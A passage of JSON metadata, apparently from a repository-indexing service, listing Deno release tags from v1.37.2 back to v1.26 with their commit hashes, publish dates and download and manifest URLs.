%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"